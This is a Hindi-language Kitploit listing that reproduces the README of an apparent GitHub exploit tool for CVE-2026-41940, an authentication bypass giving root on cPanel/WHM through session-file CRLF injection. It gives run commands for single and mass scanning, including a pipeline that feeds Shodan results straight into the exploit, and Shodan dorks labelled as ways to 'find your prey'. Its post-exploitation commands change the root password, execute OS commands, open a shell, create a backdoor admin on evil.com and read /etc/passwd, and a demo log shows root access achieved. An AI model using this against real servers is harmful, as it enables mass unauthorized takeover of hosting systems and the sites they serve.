Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — cPanel और WHM - सत्र-फ़ाइल CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बाईपास | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel और WHM - सत्र-फ़ाइल CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
141 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 CVE-2026-41940 – cPanel और WHM प्रमाणीकरण बाईपास

cPanel

⚡ बिना प्रमाणीकरण के रूट – सत्र-फ़ाइल CRLF इंजेक्शन ⚡
"एक चेन जो सब पर राज करती है।"

Python License No deps CVSS


🧠 शोषण एक नज़र में

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  चरण 1  ──  पूर्व-प्रमाणीकरण सत्र कुकी बनाएं              │
│  चरण 2  ──  `Authorization` हेडर के माध्यम से CRLF इंजेक्शन │
│  चरण 3  ──  `do_token_denied` (raw → cache) ट्रिगर करें    │
│  चरण 4  ──  JSON API के माध्यम से WHM रूट पहुंच सत्यापित करें │
└─────────────────────────────────────────────────────────────┘

💥 परिणाम – बिना किसी क्रेडेंशियल के WHM तक पूर्ण रूट पहुंच।


📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत जारी किया गया है – उपयोग, संशोधन और वितरण के लिए स्वतंत्र, लेकिन बुराई न करें 😈।
विवरण के लिए LICENSE फ़ाइल देखें।


🛠️ इंस्टॉलेशन – यह सचमुच एक लाइन है

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

शून्य निर्भरताएँ – केवल Python 3 मानक लाइब्रेरी।
आपको pip, virtualenv, या उस तरह की किसी चीज़ की ज़रूरत नहीं है।


🚀 त्वरित प्रारंभ – अभी चलाएँ

एकल लक्ष्य

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

फ़ाइल से बड़े पैमाने पर स्कैन

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

वाइल्ड से पाइप (Shodan, subfinder, आदि)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 कमांड-लाइन विकल्प (असली चीज़ें)


💀 पोस्ट-शोषण शस्त्रागार

एक बार जब आप सिस्टम को हैक कर लेते हैं, तो आप यह कर सकते हैं:

  • 🔍 सभी cPanel खाते सूचीबद्ध करें – --action list
  • 🔑 रूट पासवर्ड बदलें – --action passwd --passwd "h4ck3d!"
  • 🖥️ OS कमांड निष्पादित करें – --action cmd --cmd "id;whoami"
  • 📡 इंटरैक्टिव शेल – --action shell (पूर्ण WHM टर्मिनल)
  • 👤 बैकडोर एडमिन बनाएं – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 फ़ाइलें पढ़ें (शेल के माध्यम से) – cat /etc/passwd
  • 📊 सर्वर जानकारी एकत्र करें – --action info

🧪 डेमो – आप क्या देखेंगे

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  कॉन्फ़िगरेशन:
   लक्ष्य   : 1
   थ्रेड्स  : 10
   टाइमआउट  : 15s
   क्रिया   : केवल स्कैन

[10:23:15] [SCAN] 4-चरणीय शोषण श्रृंखला शुरू... https://192.168.1.100:2087
[10:23:15] [INFO] कैनोनिकल होस्टनाम खोजा गया: server.example.com
[10:23:15] [STEP] चरण 1/4 — पूर्व-प्रमाणीकरण सत्र बनाया जा रहा है...
[10:23:16] [  OK] चरण1: पूर्व-प्रमाणीकरण सत्र = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] चरण 2/4 — Authorization हेडर के माध्यम से CRLF इंजेक्शन...
[10:23:17] [  OK] चरण2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] चरण 3/4 — do_token_denied गैजेट फायर करना (raw→cache)...
[10:23:18] [  OK] चरण3: HTTP 401 — do_token_denied गैजेट फायर हुआ
[10:23:18] [STEP] चरण 4/4 — WHM रूट पहुंच सत्यापित की जा रही है...
[10:23:18] [INFO] चरण4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 पुष्ट — WHM रूट पहुंच! (v11.118.0.63 — असुरक्षित पुष्ट)
[10:23:18] [PWND]   टोकन    : /cpsess1234567890
[10:23:18] [PWND]   सत्र  : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   संस्करण  : 11.118.0.63
[10:23:18] [PWND]   API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — स्कैन पूर्ण
  समय: 3.2s  ·  लक्ष्य: 1

  1 असुरक्षित लक्ष्य

  [*] लक्ष्य   : https://192.168.1.100:2087
  [*] संस्करण  : 11.118.0.63
  [*] टोकन    : /cpsess1234567890
  [*] API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] सत्र  : 9a7f8e3d2c1b0a9f
  [*] साक्ष्य : {"version":"11.118.0.63",...}

🔎 Shodan Dorks (अपना शिकार खोजें)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 प्रभावित संस्करण – पैच स्थिति

इन बिल्ड्स से नीचे के सभी संस्करण असुरक्षित हैं।


🕵️‍♂️ लेखक और श्रेय

0xgh057r3c0n – सुरक्षा शोधकर्ता, रिवर्स इंजीनियर, और कॉफ़ी प्रेमी।
GitHub | Twitter


⚠️ अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक और योगदानकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।
ज़िम्मेदारी से उपयोग करें, और हमेशा पहले अनुमति लें।


🌟 समर्थन / योगदान

  • बग मिला? एक issue खोलें।
  • कोड बेहतर बनाना चाहते हैं? PR का स्वागत है।
  • टूल पसंद आया? GitHub पर इसे ⭐ दें!

🔥 ग्रह को हैक करें, लेकिन कानूनी रहें। 🔥

टूल डाउनलोड करें
फ़्लैगविवरण
-u, --urlएकल लक्ष्य URL (जैसे https://host:2087)
-l, --listफ़ाइल जिसमें प्रति पंक्ति एक URL हो
--hostnameकैनोनिकल Host हेडर ओवरराइड करें (स्वतः-खोजा गया)
-t, --threadsथ्रेड्स (डिफ़ॉल्ट: 10)
--timeoutसेकंड में टाइमआउट (डिफ़ॉल्ट: 15)
--rate-limitलक्ष्यों के बीच प्रतीक्षा (सेकंड)
--actionपोस्ट-शोषण: list, passwd, cmd, exec, info, version, shell, adduser
--passwdनया रूट पासवर्ड (--action passwd के साथ)
--cmdOS कमांड (--action cmd/exec के साथ)
--new-userनया cPanel उपयोगकर्ता नाम (--action adduser के साथ)
--new-domainनया cPanel डोमेन (--action adduser के साथ)
-o, --outputपरिणाम JSON में सहेजें
शाखापैच किया गया बिल्डस्थिति
11.11011.110.0.97🛡️ ठीक
11.11811.118.0.63🛡️ ठीक
11.12611.126.0.54🛡️ ठीक
11.13211.132.0.29🛡️ ठीक
11.13411.134.0.20🛡️ ठीक
11.13611.136.0.5🛡️ ठीक